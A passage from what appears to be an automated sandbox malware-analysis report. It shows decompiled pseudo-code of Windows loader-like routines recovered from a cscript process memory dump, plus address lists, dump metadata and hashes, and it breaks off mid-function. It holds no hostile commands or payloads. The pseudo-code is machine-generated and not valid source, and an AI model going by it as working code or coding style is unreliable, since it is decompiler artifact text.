											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x36b2ef8
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x36b2e48
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x36b2ef8
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x36b3208
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E054CFFB0(_t287, _t353, 0x55a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0550CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E054C6600(0x55a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E054C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x55ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0553E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x55a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x55ab218; // 0x0
														asm("ror edi, cl");
														 *0x55ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E054D2280(_t250, 0x55a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L054F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E054CFFB0(_t293, _t353, 0x55a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E054F37F5(_t353, 0);
																}
																E054F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E054E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E054E02D6(_t174);
																}
																L054D77F0( *0x55a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E054EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L054CEC7F(_t353);
										L054E19B8(_t287, 0, _t353, 0);
										_t200 = E054BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E054FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x55ab2f8; // 0x11c0000
									if((_t206 |  *0x55ab2fc) == 0 || ( *0x55ab2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x55ab2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05566B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05566AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E054CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L054CEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E054F9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E054CE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L054C8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E054F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x054cd5f2
0x054cd5f5
0x054cd5f5
0x054cd5fd
0x054cd600
0x054cd60a
0x054cd60d
0x054cd617
0x054cd61d
0x054cd627
0x054cd62e
0x054cd911
0x054cd913
0x00000000
0x054cd919
0x054cd919
0x054cd919
0x054cd634
0x054cd634
0x054cd634
0x054cd634
0x054cd640
0x054cd8bf
0x00000000
0x054cd646
0x054cd646
0x054cd64d
0x054cd652
0x0551b2fc
0x0551b2fc
0x0551b302
0x0551b33b
0x0551b341
0x00000000
0x0551b304
0x0551b304
0x0551b319
0x0551b31e
0x0551b324
0x0551b326
0x0551b332
0x0551b347
0x0551b34c
0x0551b351
0x0551b35a
0x00000000
0x0551b328
0x0551b328
0x00000000
0x0551b328
0x0551b326
0x054cd658
0x054cd658
0x054cd65b
0x054cd665
0x00000000
0x054cd66b
0x054cd66b
0x054cd66b
0x054cd66b
0x054cd66d
0x054cd672
0x054cd67a
0x00000000
0x00000000
0x054cd680
0x054cd686
0x054cd8ce
0x054cd8d4
0x054cd8da
0x054cd8dd
0x054cd8dd
0x054cd8e0
0x054cd68c
0x054cd691
0x054cd69d
0x054cd6a2
0x054cd6a7
0x054cd6b0
0x054cd6b0
0x054cd6b5
0x054cd6e0
0x054cd6b7
0x054cd6b7
0x054cd6b9
0x054cd6b9
0x054cd6bb
0x054cd6bd
0x054cd6ce
0x054cd6d0
0x054cd6d2
0x0551b363
0x0551b365
0x00000000
0x0551b36b
0x00000000
0x0551b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x054cd6bf
0x054cd6bf
0x054cd6e5
0x054cd6e7
0x054cd6e9
0x054cd6e9
0x054cd6ec
0x054cd6ec
0x054cd6ef
0x054cd6f5
0x054cd6f9
0x054cd6fb
0x054cd6fd
0x054cd701
0x054cd703
0x054cd70a
0x054cd70a
0x054cd70a
0x054cd701
0x054cd70d
0x054cd710
0x054cd710
0x054cd6c1
0x054cd6c1
0x054cd6c1
0x054cd6c6
0x0551b36d
0x0551b36f
0x00000000
0x0551b375
0x0551b375
0x0551b375
0x00000000
0x0551b375
0x00000000
0x054cd6cc
0x054cd6d8
0x054cd6d8
0x054cd6d8
0x00000000
0x054cd6c6
0x054cd6bf
0x00000000
0x054cd6da
0x054cd6da
0x054cd716
0x054cd71b
0x054cd720
0x054cd726
0x054cd726
0x054cd72d
0x00000000
0x054cd733
0x054cd739
0x054cd742
0x054cd750
0x054cd758
0x054cd764
0x054cd776
0x054cd77a
0x054cd783
0x054cd928
0x054cd92c
0x054cd93d
0x054cd944
0x054cd94f
0x054cd954
0x054cd956
0x054cd95f
0x054cd961
0x054cd973
0x054cd973
0x054cd956
0x054cd944
0x054cd92c
0x054cd78b
0x0551b394
0x054cd791
0x054cd798
0x0551b3a3
0x0551b3bb
0x0551b3bb
0x054cd7a5
0x054cd866
0x054cd870
0x054cd884
0x054cd892
0x054cd898
0x054cd89e
0x054cd8a0
0x054cd8a6
0x054cd8ac
0x054cd8ae
0x054cd8b4
0x054cd8b4
0x054cd8ae
0x054cd7a5
0x054cd78b
0x054cd7b1
0x0551b3c5
0x0551b3c5
0x054cd7c3
0x054cd7ca
0x054cd7e5
0x054cd7eb
0x054cd8eb
0x054cd8ed
0x00000000
0x054cd8f3
0x054cd8f3
0x054cd8f3
0x00000000
0x054cd8ed
0x054cd7cc
0x054cd7cc
0x054cd7d2
0x00000000
0x054cd7d4
0x054cd7d4
0x054cd7d7
0x054cd7df
0x0551b3d4
0x0551b3d9
0x0551b3dc
0x0551b3dc
0x0551b3df
0x0551b3e2
0x0551b468
0x0551b46d
0x0551b46f
0x0551b46f
0x0551b475
0x054cd8f8
0x054cd8f9
0x054cd8fd
0x0551b3e8
0x0551b3e8
0x0551b3eb
0x0551b3ed
0x00000000
0x0551b3ef
0x0551b3ef
0x0551b3f1
0x0551b3f4
0x0551b3fe
0x0551b404
0x0551b409
0x0551b40e
0x0551b410
0x0551b410
0x0551b414
0x0551b414
0x0551b41b
0x0551b420
0x0551b423
0x0551b425
0x0551b427
0x0551b42a
0x0551b42d
0x0551b42d
0x0551b42a
0x0551b432
0x0551b436
0x0551b438
0x0551b43b
0x0551b43b
0x0551b449
0x0551b44e
0x0551b454
0x0551b458
0x0551b458
0x0551b45d
0x00000000
0x0551b45d
0x0551b3ed
0x00000000
0x00000000
0x00000000
0x054cd7df
0x054cd7d2
0x054cd7ca
0x0551b37c
0x0551b37e
0x0551b385
0x0551b38a
0x00000000
0x0551b38a
0x054cd742
0x054cd7f1
0x054cd7f8
0x0551b49b
0x0551b49b
0x054cd800
0x054cd837
0x054cd843
0x054cd845
0x054cd847
0x054cd84a
0x054cd84b
0x054cd84e
0x054cd857
0x054cd802
0x054cd802
0x054cd80d
0x00000000
0x054cd818
0x054cd818
0x054cd824
0x054cd831
0x0551b4a5
0x0551b4ab
0x0551b4b3
0x0551b4b8
0x0551b4bb
0x00000000
0x0551b4c1
0x0551b4c1
0x0551b4c8
0x00000000
0x0551b4ce
0x0551b4d4
0x0551b4e1
0x0551b4e3
0x0551b4e5
0x00000000
0x0551b4eb
0x0551b4f0
0x0551b4f2
0x054cdac9
0x054cdacc
0x054cdacf
0x054cdad1
0x054cdd78
0x054cdd78
0x054cdcf2
0x00000000
0x054cdad7
0x054cdad9
0x054cdadb
0x00000000
0x00000000
0x054cdae1
0x054cdae1
0x054cdae4
0x054cdae6
0x0551b4f9
0x0551b4f9
0x0551b500
0x054cdaec
0x054cdaec
0x054cdaf5
0x054cdaf8
0x054cdafb
0x054cdb03
0x054cdb11
0x054cdb16
0x054cdb19
0x054cdb1b
0x0551b52c
0x0551b531
0x0551b534
0x054cdb21
0x054cdb21
0x054cdb24
0x054cdcd9
0x054cdce2
0x054cdce5
0x054cdd6a
0x054cdd6d
0x00000000
0x054cdd73
0x0551b51a
0x0551b51c
0x0551b51f
0x0551b524
0x00000000
0x0551b524
0x054cdce7
0x054cdce7
0x054cdce7
0x00000000
0x054cdce7
0x00000000
0x054cdb2a
0x054cdb2c
0x054cdb31
0x054cdb33
0x054cdb36
0x054cdb39
0x054cdb3b
0x054cdb66
0x054cdb66
0x054cdb3d
0x054cdb3d
0x054cdb3e
0x054cdb46
0x054cdb47
0x054cdb49
0x054cdb4c
0x054cdb53
0x054cdb55
0x054cdb58
0x054cdb5a
0x0551b50a
0x0551b50f
0x0551b512
0x054cdb60
0x054cdb60
0x054cdb63
0x054cdb63
0x00000000
0x054cdb63
0x054cdb5a
0x054cdb3b
0x054cdb24
0x054cdb69
0x054cdb69
0x054cdb6c
0x054cdb6f
0x054cdb74
0x0551b557
0x0551b557
0x0551b55e
0x054cdb7a
0x054cdb7c
0x054cdb7f
0x054cdb82
0x054cdb85
0x00000000
0x054cdb8b
0x054cdb8b
0x054cdb8d
0x054cdb9b
0x054cdb9b
0x054cdb9d
0x054cdba0
0x054cdba2
0x054cdba4
0x054cdba7
0x054cdba9
0x054cdbae
0x054cdbae
0x054cdbb1
0x054cdbb4
0x054cdbb4
0x054cdbb7
0x054cdbba
0x054cdcd2
0x054cdcd4
0x00000000
0x054cdbc0
0x054cdbc0
0x054cdbd2
0x054cdbd7
0x054cdbda
0x054cdbdd
0x054cdbdf
0x00000000
0x054cdbe5
0x054cdbe5
0x054cdbee
0x054cdbf1
0x0551b541
0x0551b544
0x00000000
0x0551b546
0x0551b546
0x00000000
0x0551b546
0x054cdbf7
0x054cdbf7
0x054cdbfd
0x054cdbfd
0x054cdbff
0x054cdc0b
0x054cdc15
0x054cdc1b
0x054cdc1d
0x054cdc21
0x054cdc21
0x054cdc23
0x054cdc23
0x054cdc26
0x054cdc29
0x054cdc2b
0x00000000
0x00000000
0x054cdc31
0x054cdc34
0x054cdc36
0x054cdcbf
0x054cdcbf
0x054cdcc2
0x00000000
0x054cdc3c
0x054cdc41
0x054cdc43
0x00000000
0x054cdc45
0x054cdc45
0x054cdc47
0x00000000
0x054cdc4d
0x054cdc4d
0x054cdc50
0x054cdc52
0x054cdc55
0x054cdcfa
0x054cdcfe
0x054cdd08
0x054cdd0a
0x054cdd0c
0x00000000
0x054cdd12
0x054cdd15
0x054cdd2d
0x054cdd2f
0x054cdd32
0x054cdd35
0x00000000
0x054cdd35
0x054cdc5b
0x054cdc5b
0x054cdc5e
0x054cdc61
0x054cdc64
0x054cdc67
0x054cdc67
0x054cdc6a
0x054cdc6c
0x054cdc8e
0x054cdc8e
0x054cdc91
0x054cdc93
0x054cdcce
0x054cdcce
0x054cdc95
0x054cdc9c
0x054cdc6e
0x054cdc72
0x054cdc75
0x054cdc77
0x054cdc79
0x0551b551
0x0551b551
0x00000000
0x054cdc7f
0x054cdc7f
0x054cdc81
0x00000000
0x054cdc83
0x054cdc86
0x054cdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x054cdc88
0x054cdc81
0x054cdc79
0x054cdc6c
0x054cdc55
0x054cdc47
0x054cdc43
0x00000000
0x054cdc36
0x054cdc23
0x00000000
0x054cdbff
0x054cdbf1
0x054cdbdf
0x054cdb8f
0x054cdb92
0x054cdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x054cdb95
0x054cdb8d
0x054cdb85
0x054cdb74
0x054cdc9f
0x054cdca2
0x054cdcb0
0x054cdcb0
0x054cdad1
0x0551b4e5
0x0551b4c8
0x00000000
0x00000000
0x00000000
0x054cd831
0x054cd80d
0x00000000
0x054cd800
0x0551b47f
0x0551b485
0x00000000
0x0551b485
0x054cd665
0x054cd652
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6158f54b8717001ae31f5c651bbe48d35e9389d7d9e6882cd6d3efdcc92bd5cc
Instruction ID: c9fe9da707327d8758af135e24c4239ec6639b066044d14be3fe7816a40d39d4
Opcode Fuzzy Hash: 6158f54b8717001ae31f5c651bbe48d35e9389d7d9e6882cd6d3efdcc92bd5cc
Instruction Fuzzy Hash: 5FE1C338F052998FEB64DF24C844BBABBB2BF85314F0441EFD90A57290DB749985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054C849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E054C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x558f9c0);
				E0550D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x55a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E054CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E054D2280( *[fs:0x30], 0x55a8550);
						_t139 =  *0x55a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E054EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E054CFFB0(_t193, _t235, 0x55a8550);
								L5:
								return E0550D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E054B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x55a7b9c; // 0x0
							_t235 = L054D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x55a7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E054EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E054CFFB0(_t193, _t235, 0x55a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L054D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L054D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x55a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x55a7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E054F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x55a7b9c; // 0x0
									_t214 = L054D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E054F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x55a7b10 =  *0x55a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x55a7b04 =  *0x55a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L054D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
